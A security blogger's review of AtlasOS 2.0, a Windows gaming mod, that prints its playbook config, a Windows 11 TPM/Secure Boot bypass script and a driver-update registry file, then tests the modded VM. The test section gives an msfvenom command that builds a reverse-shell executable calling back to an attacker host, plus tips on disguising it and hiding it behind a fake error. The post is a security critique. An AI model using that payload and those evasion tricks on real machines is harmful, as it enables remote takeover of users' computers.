AtlasOS 2.0
Hello everyone, it has been a long time since I sat and spent some time picking something apart, so what better time than nearly a year later to finally take another look into AtlasOS.
Yes, AtlasOS, the gaming mod for Windows 10 and now 11(!) has had some updates (Mainly to bring it to Windows 11) and being a security minded individual I want to take another look into it, this time as a blog post as opposed to a tweetstorm - Twitter Thread
So where do we begin? Well we have a Windows 10 VM all warmed up and ready to play, so let’s dive into it.
Preamble
A year ago I found some talk online about AtlasOS, a mod for Windows to make older machines more ‘spritely’ and able to run games a little better.
An obvious Win for people who can’t afford NVIDIA’s newest hotness every other 6 months.
What I found however got me thinking, and when I think, warranties get voided.
So I spun up twitter, sat down and picked away at the site and then the ran the installer to see what happens.
The TL;DR on this was it basically turns off all security and suggestions/scanning leaving it wide open to a ‘basic’, ‘script kiddie level’ reverse shell disguised as a crummy mod pack for CS:GO.
Oh the traction this got… it was actually quite a surprise to see how popular it was. I also didn’t realize, immediately anyway, that Linus Tech Tips had just the day prior dropped a video praising AtlasOS for getting modern games on older hardware… Oh the timing of it all.
As time has gone on Atlas has realized their mistakes and advised that they would ‘put security back’ into AtlasOS in the next update.
The Next Update
So here we are some 11 months after my tweet storm and ready to crack on with Round 2.
Windows 11 compatability
Now this is a big step for any mod pack that strips the security out of windows… sorry ‘gaming mod pack’… Getting it running on the newest windows Operating system that itself is already pretty darned good at getting games running, really is something…
So I had a look at the downloads this time round and found the following:
We have our ‘AtlasPlaybook_v0.3.2.apbx’ file, which is the playbook that the AME wizard will read. Think of it as the list of instructions the installer fill follow.
Next is our interestingly named ‘Bypass Windows 11 Requirements.cmd’ which is a command prompt file. Again this will be run or opened in command prompt and burn through a list of instructions and likely be ran on Windows 10 before you run the AME wizard and Playbook file.
Finally we have ‘Disable Automatic Driver Installation.reg’, the name seems pretty clear,,, but why?
Righty, let’s look into these files first before actually letting the installer run loose (we saw how that worked on twitter last time so I’m not as in much of a rush to take 50 screenshots of that again haha)
AtlasPlaybook_v0.3.2.apbx
This file is the ‘instructions’ file for the AME Wizard, it will install certain applications and make certain changes.
Well let’s bust that open in my Kali Virtual machine and use the UNCHANGED PASSWORD(!!!) from the last Zip file:
God I love that wallpaper, remind me to make a backup incase it get’s changed in an update.
So yeah, pretty similar to last time… let’s open the config file and see whats being configured:
<?xml version="1.0" encoding="utf-8"?>
<Playbook>
<Name>AtlasOS</Name>
<Username>Atlas</Username>
<Title>AtlasOS Playbook v0.3.2</Title>
<ShortDescription>AtlasOS Playbook for Windows 10 and 11</ShortDescription>
<Description><![CDATA[This Playbook will deploy AtlasOS, making your computer snappier and more private with lots of usability improvements.
⚠️ This will make changes to Windows that require a reinstall to revert. See the documentation before use.]]></Description>
<Details>An open and lightweight modification to Windows, designed to optimize performance, privacy and security.</Details>
<Version>0.3.2</Version>
<SupportedBuilds>
<string>19045</string>
<string>22631</string>
</SupportedBuilds>
<Requirements>
<Requirement>DefenderToggled</Requirement>
<Requirement>Internet</Requirement>
<Requirement>NoAntivirus</Requirement>
<Requirement>NoPendingUpdates</Requirement>
<Requirement>PluggedIn</Requirement>
<Requirement>Activation</Requirement>
</Requirements>
<Overhaul>true</Overhaul>
<UseKernelDriver>false</UseKernelDriver>
<ProductCode>64</ProductCode>
<EstimatedMinutes>15</EstimatedMinutes>
<Git>https://github.com/Atlas-OS/Atlas</Git>
<Website>https://atlasos.net</Website>
<DonateLink>https://ko-fi.com/atlasos</DonateLink>
<FeaturePages>
<RadioPage IsRequired="true" DefaultOption="defender-enable" Description="Disabling Defender has risks, but it can also improve performance.">
<TopLine Text="It can be changed in the Atlas folder later."/>
<Options>
<RadioOption>
<Text>Enable Defender (recommended)</Text>
<Name>defender-enable</Name>
</RadioOption>
<RadioOption>
<Text>Disable Defender</Text>
<Name>defender-disable</Name>
</RadioOption>
</Options>
<BottomLine Text="Learn more" Link="https://docs.atlasos.net/getting-started/post-installation/atlas-folder/security/#defender"/>
</RadioPage>
<RadioPage IsRequired="true" DefaultOption="mitigations-default" Description="Disabling mitigations reduces security, but improves performance on older CPUs.">
<TopLine Text="It can be changed in the Atlas folder later."/>
<Options>
<RadioOption>
<Text>Default Windows Mitigations (recommended)</Text>
<Name>mitigations-default</Name>
</RadioOption>
<RadioOption>
<Text>Disable All Mitigations</Text>
<Name>mitigations-disable</Name>
</RadioOption>
</Options>
<BottomLine Text="Learn more" Link="https://docs.atlasos.net/getting-started/post-installation/atlas-folder/security/#mitigations"/>
</RadioPage>
<RadioPage IsRequired="true" DefaultOption="vbs-disable" Description="Enabling core isolation protects important parts of Windows, but at the cost of performance.">
<TopLine Text="It can be changed in the Atlas folder later."/>
<Options>
<RadioOption>
<Text>Disable Core Isolation (recommended)</Text>
<Name>vbs-disable</Name>
</RadioOption>
<RadioOption>
<Text>Windows Default</Text>
<Name>vbs-default</Name>
</RadioOption>
</Options>
<BottomLine Text="Learn more" Link="https://docs.atlasos.net/getting-started/post-installation/atlas-folder/security/#core-isolation"/>
</RadioPage>
<CheckboxPage IsRequired="true" Description="Select the miscellaneous options you would like to use, they can be changed in the Atlas folder.">
<Options>
<CheckboxOption>
<Text>Remove Microsoft Edge</Text>
<Name>uninstall-edge</Name>
</CheckboxOption>
<CheckboxOption>
<Text>Disable Bluetooth</Text>
<Name>disable-bluetooth</Name>
</CheckboxOption>
<CheckboxOption>
<Text>Disable Power Saving</Text>
<Name>disable-power-saving</Name>
</CheckboxOption>
</Options>
<BottomLine Text="Learn more" Link="https://docs.atlasos.net/getting-started/post-installation/atlas-folder/configuration"/>
</CheckboxPage>
<RadioImagePage CheckDefaultBrowser="true" DependsOn="uninstall-edge" DefaultOption="browser-brave" Description="Select your preferred browser to install, as Microsoft Edge will be uninstalled.">
<TopLine Text="Chrome isn't good for privacy, it's not recommended."/>
<Options>
<RadioImageOption None="true"/>
<RadioImageOption>
<Text>Brave</Text>
<Name>browser-brave</Name>
<FileName>brave</FileName>
<GradientTopColor>#131524</GradientTopColor>
<GradientBottomColor>#3b3e4f</GradientBottomColor>
</RadioImageOption>
<RadioImageOption>
<Text>Waterfox</Text>
<Name>browser-waterfox</Name>
<FileName>waterfox</FileName>
<GradientTopColor>#4676ed</GradientTopColor>
<GradientBottomColor>#acf5fe</GradientBottomColor>
</RadioImageOption>
<RadioImageOption>
<Text>Chrome</Text>
<Name>browser-chrome</Name>
<FileName>chrome</FileName>
<GradientTopColor>#e33b2e</GradientTopColor>
<GradientBottomColor>#E38A84</GradientBottomColor>
</RadioImageOption>
</Options>
<BottomLine Text="Learn more" Link="https://docs.atlasos.net/getting-started/post-installation/software/web-browsers"/>
</RadioImagePage>
</FeaturePages>
</Playbook>
… 👀👀
OH GOD MAKE IT STOP!
But hey least we will put it to the test later on amirite?
I find it interesting, at this stage anyway, that the options and notes are showing for ‘hey you can disable this which may do XYZ, but you can leave it enabled too’… let’s see what happens when installing eh?
Also still removing Edge, which is backed by Chromium for checks notes Brave, another browser backed by Chromium…. I mean ok maybe this is the bit where they say ‘makes it more private’ because they installed a privacy minded browser.. yay(?)
The rest of the zip file contains some shortcuts that would be placed on the AtlasDesktop to do certain things, mostly PowerShell Scripts and .cmd files to run at the users digression.
Let’s move onto the next file.
Bypass Windows 11 Requirements.cmd
This file is a ‘interesting read’ for people who are ‘into’ security.
Infact it’s 74 lines long, wanna see how big that is?
@echo off
title Bypass Windows 11 Requirements
cd /d "%~dp0"
fltmc > nul 2>&1 || (
echo Administrator privileges are required.
PowerShell Start -Verb RunAs '%0' 2> nul || (
echo You must run this script as admin.
exit /b 1
)
exit /b
)
:: set ANSI escape characters
cd /d "%~dp0"
for /f %%a in ('forfiles /m "%~nx0" /c "cmd /c echo 0x1B"') do set "ESC=%%a"
set "right=%ESC%[<x>C"
set "bullet= %ESC%[34m-%ESC%[0m"
:main
mode con: cols=51 lines=18
chcp 65001 > nul
echo]
echo %ESC%[31m Are you sure you want to bypass requirements?
echo ───────────────────────────────────────────────%ESC%[0m
echo Bypassing Windows 11 requirements %ESC%[4misn't%ESC%[0m
echo %ESC%[4mrecommended%ESC%[0m, and you could encounter issues in
echo the future, e.g. anticheats or other features.
echo]
echo %ESC%[7mSoftware that needs the requirements:%ESC%[0m
echo %bullet% Vanguard/VALORANT
echo %bullet% Core isolation
echo %bullet% Windows Hello
echo %bullet% BitLocker
echo]
echo This list could expand in the future and might
echo not cover everything.
echo]
<nul set /p=%right:<x>=2%%ESC%[1m%ESC%[33mType 'I understand' to continue: %ESC%[0m
:: This forces the user to type 'I understand' on the same line
setlocal EnableDelayedExpansion
set "str=I understand"
for /l %%a in (0 1 12) do (
if not "!str:~%%a,1!" == "" call :xcopyInput "!str:~%%a,1!"
)
endlocal
echo]
echo %ESC%[2A%ESC%[?25l
:runCommands
reg add "HKLM\SYSTEM\Setup\LabConfig" /v "BypassRAMCheck" /t REG_DWORD /d "1" /f > nul
reg add "HKLM\SYSTEM\Setup\LabConfig" /v "BypassSecureBootCheck" /t REG_DWORD /d "1" /f > nul
reg add "HKLM\SYSTEM\Setup\LabConfig" /v "BypassTPMCheck" /t REG_DWORD /d "1" /f > nul
echo %ESC%[32m Completed! %ESC%[0mPress any key to exit... %ESC%[1A
pause > nul
exit /b
:::::::::::::::::::::::::::::::::::::::::::::
:: -------------- FUNCTIONS -------------- ::
:::::::::::::::::::::::::::::::::::::::::::::
:xcopyInput <"key">
set "key="
for /f "delims=" %%a in ('2^>nul xcopy.exe /w /l "%~f0" "%~f0"') do if not defined key set "key=%%a"
set "key=%key:~-1%"
if /i "%key%" == "%~1" (
if "%~1" == " " (
<nul set /p=%right:<x>=1%
) else <nul set /p=%~1
) else goto :xcopyInput
exit /b
That’s it, the entire file and list of instructions.
Now a lot of the above is actually what I would call ‘fluff and filler’ i.e. the bits to give it it’s appearance and functionality.
The ‘important’ parts, to me anyway, are the actual commands it is running:
reg add "HKLM\SYSTEM\Setup\LabConfig" /v "BypassRAMCheck" /t REG_DWORD /d "1" /f > nul
reg add "HKLM\SYSTEM\Setup\LabConfig" /v "BypassSecureBootCheck" /t REG_DWORD /d "1" /f > nul
reg add "HKLM\SYSTEM\Setup\LabConfig" /v "BypassTPMCheck" /t REG_DWORD /d "1" /f > nul
For a ‘company’ that said, we care about security and we are ‘going to put security back’ that sure doesn’t look like it.
In fact it looks like you are bypassing the installer requirement for Windows 11 which asks for a TPM to be installed to your machine as well as Secure Boot.
This compelled me to reach out to my close personal friend David Weston to query his thoughts on the Windows 11 Security features and how these are actually a good thing for the end user and upon my call connecting he asked ‘I’m sorry who is this again?’.
I dont have the full conversation recorded so you will have to settle for this video from Scott Hanselman chatting with David on these features:
See, Microsoft wanted to make security a big thing, so why not AtlasOS?
This is absolutely ran on Windows 10 to ‘bypass’ the requirements to upgrade it to Windows 11, Fair Play, it gets older machines to Windows 11…. BUT AT WHAT COST?!?
Disable Automatic Driver Installation.reg
Short but sweet on this one, the code:
Windows Registry Editor Version 5.00
; Exclude drivers from Windows Update
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\current\device\Update]
"ExcludeWUDriversInQualityUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Update]
"ExcludeWUDriversInQualityUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings]
"ExcludeWUDriversInQualityUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"ExcludeWUDriversInQualityUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Update\ExcludeWUDriversInQualityUpdate]
"value"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata]
"PreventDeviceMetadataFromNetwork"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching]
"SearchOrderConfig"=dword:00000000
"DontSearchWindowsUpdate"=dword:00000001
What it does as explained by ChatGPT for no reason other than it made my life easier:
In summary, these registry edits are aimed at excluding certain drivers from being updated via Windows Update, preventing device metadata retrieval from the network and modifying driver search settings to avoid searching for drivers on Windows Update.
So when you need a driver for something you need to go google it and download it from some dodgy third party that probably doesn’t have a shed load of spyware or malware in it.
Installation
Ok so we have beat around the bush for long enough… let’s run the AME Wizard and let it f*ck over my Windows 10 VM (we are sticking with 10 as per last time, I may try Windows 11 IF I get the time).
Ah so as we process through this is where the ‘options’ are:
It also gives us options for a browser like; Chrome, Brave, Waterfox.. not too bad, I can see a better use for these playbooks for configuring multiple PCs of a certain spec but at that point you would just use something more robust like a custom Windows Image or a PowerShell/AD Script, this is aimed at the ‘common man’ though so nice and easy.
Anyhoos, I’m just going to let it run and install, the fun part is later anyway:
Yes!! I got it!!
🤣🤣🤣🤣🤣
~Some Time Later~
Ok so were suited, rebooted and ready to roll:
Looks very different but that’s not why we’re here… let’s try stuff:
…. I don’t know what I expected really.
The code used:
msfvenom -p windows/shell_reverse_tcp LHOST=<Kali Box IP> LPORT=1337 -f exe > test-x64.exe
Not rocket salad. No alerts. No Warnings.
🤦♂️
Now remember, on the tweetstorm I used PowerStager to disguise my downloaded .exe as a CS:GO icon which would fool people if they are unfamiliar.
Additionally Windows Defender would have stopped you from downloading it in the first place (at least till I worked a little harder on it and bypassed defender 😈).
It is also entirely possible to pop up an error window so when you the download it alerts saying ‘FILE CORRUPTED, please redownload and try again’ as an error, all while the reverse shell connects to hacker machine and boom, you’re in and undetected still.
Takeaways
So AtlasOS, yeh they made improvements and made it look a little better, BUT it’s still insecure, almost by default.
Bypassing the Windows 11 TPM and Security features purely to get AtlasOS installed on Windows 11, is a big no no. Security is important and the average user is not going to notice a hundred megs in the background doing intelligent file scanning and Real Time Protection of the Operating System.
I mean yeah you can ‘warn’ all you like and put ‘recommended’ here there and everywhere but users want the easiest option for the least amount of work, and what that means is that there are possibly quite a few AtlasOS machines out there, with the potential to be exploited and even botnetted.
I’m not the expert but I’m a damn good learner.
I hope this post helps any wondering about AtlasOS or any wondering If I ever did an update after the last one… who knows maybe in a years time we can do another update and see what’s going on in round 3 haha.
Be Safe and Stay Dangerous friends.
🤙
I don’t have any sponsors or anything but if you enjoy my work, or feel sympathy for my wife, then I have set up a Ko-Fi account as well as a BuyMeACoffee people can donate to.